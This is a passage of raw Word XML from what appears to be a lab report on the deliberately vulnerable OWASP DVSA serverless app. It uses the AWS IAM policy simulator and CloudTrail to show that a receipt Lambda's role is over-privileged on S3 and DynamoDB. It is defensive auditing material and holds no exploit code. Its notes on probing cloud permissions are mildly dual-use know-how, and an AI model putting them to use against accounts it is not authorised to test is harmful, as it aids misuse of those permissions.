      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Roles</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA5E837" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t>Search and select the receipt function execution role:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>serverlessrepo-OWASP-DVSA-SendReceiptFunctionRole-...</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CA4597" w14:textId="066C3E4D" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69"/>
    <w:p w14:paraId="31DCBA3A" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3: S3 Permission Blast-Radius Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE10D05" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">On the right panel, select the service: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Amazon S3</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BD83BD" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">Add the following actions: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18739426" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">GetObject </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250728E8" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">PutObject </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB9217A" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run Simulation</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F460CF4" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t>For each action, test against a sample resource ARN such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6BB8FD" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:r w:rsidRPr="004A3F69">
        <w:t>arn:aws:s3:::some-bucket/some-key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4C5A3" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">Observe the results: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543EBE47" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">s3:GetObject → </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06168F40" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">s3:PutObject → </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4A3EE" w14:textId="1931D84D" w:rsidR="00AE17CD" w:rsidRDefault="004A3F69" w:rsidP="00AE17CD">
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interpretation:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:br/>
        <w:t>These results indicate that the role may access objects across S3 resources, which exceeds the expected permissions required for a simple “send receipt” function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491348C2" w14:textId="31E25ABF" w:rsidR="00AE17CD" w:rsidRPr="004A3F69" w:rsidRDefault="00AE17CD" w:rsidP="00AE17CD">
      <w:r w:rsidRPr="00AE17CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53C02C46" wp14:editId="17063A65">
            <wp:extent cx="5943600" cy="3335020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12984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79340" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3335020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61309E1F" w14:textId="019EB584" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69"/>
    <w:p w14:paraId="212EED32" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: DynamoDB Permission Blast-Radius Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204E5A27" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the simulator, select the service: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Amazon DynamoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E54C7A" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">Add the following actions: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3DB03" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">Scan </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E5AAC8" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">GetItem </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D55FF8" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">PutItem </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF9878" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">DeleteItem </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19093C" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t>Run the simulation using a test resource ARN such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7484343C" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:r w:rsidRPr="004A3F69">
        <w:t>arn:aws:dynamodb:us-east-1:&lt;ACCOUNT_ID&gt;:table/some-table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED4E24D" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">Observe the results: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA6B3B" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">dynamodb:Scan → </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF0864E" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">dynamodb:GetItem → </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D504E" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">dynamodb:PutItem → </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE7E74" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">dynamodb:DeleteItem → </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45556A21" w14:textId="2EBDA30E" w:rsidR="00BD7B00" w:rsidRPr="004A3F69" w:rsidRDefault="00BD7B00" w:rsidP="00BD7B00">
      <w:r w:rsidRPr="00BD7B00">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C250CB4" wp14:editId="25204DCC">
            <wp:extent cx="5943600" cy="3364230"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="76885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51385" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3364230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5F1DF" w14:textId="40A63C81" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69"/>
    <w:p w14:paraId="233CC7AA" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5: Interpretation of Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC47B74" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:r w:rsidRPr="004A3F69">
        <w:lastRenderedPageBreak/>
        <w:t>The simulation demonstrates that the execution role has broad permissions across DynamoDB tables within the account and region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C101E9" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:r w:rsidRPr="004A3F69">
        <w:t>This implies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873095B" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">The Lambda function can read, modify, and delete data from </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any DynamoDB table</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">, not only DVSA-related tables. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703ACD5C" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">The granted permissions exceed the principle of </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>least privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE53271" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">The potential </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>blast radius</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> is significantly larger than required for the function’s intended behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D174481" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="65D4CB56" w14:textId="6B1A7C82" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00A421AC" w:rsidP="00F24B84">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Continued </w:t>
      </w:r>
      <w:r w:rsidR="00F24B84" w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 5) Evidence and Proof (CloudTrail-Based Verification of Actual Usage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F89835A" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">To strengthen our hypothesis about over-privileged permissions, we now verify what the Lambda function </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>actually uses in runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> using AWS CloudTrail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980D6C2" w14:textId="75F55D46" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84"/>
    <w:p w14:paraId="6EBB99C1" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5: Enable AWS CloudTrail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0673AE" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Navigate to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS CloudTrail</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4890A9B6" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trails</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> in the left-hand menu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB7A3D" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create trail</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D6F2B" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Configure the trail with the following settings: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093EABF3" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trail name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> dvsa-policygen-trail </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44574F43" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-region trail:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> Enabled (Yes) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648889D7" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Management events:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> Enabled (On) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CE867" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data events:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> Disabled (Off) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210C9575" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> Allow AWS to automatically create the S3 log bucket </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACE5B67" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t>Confirm that the trail status changes to:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF8257" w14:textId="77777777" w:rsidR="00081012" w:rsidRDefault="00081012" w:rsidP="00081012"/>
    <w:p w14:paraId="7F751B90" w14:textId="7BFF788D" w:rsidR="00081012" w:rsidRDefault="00081012" w:rsidP="00081012">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Also, here is a successful attempt of the </w:t>
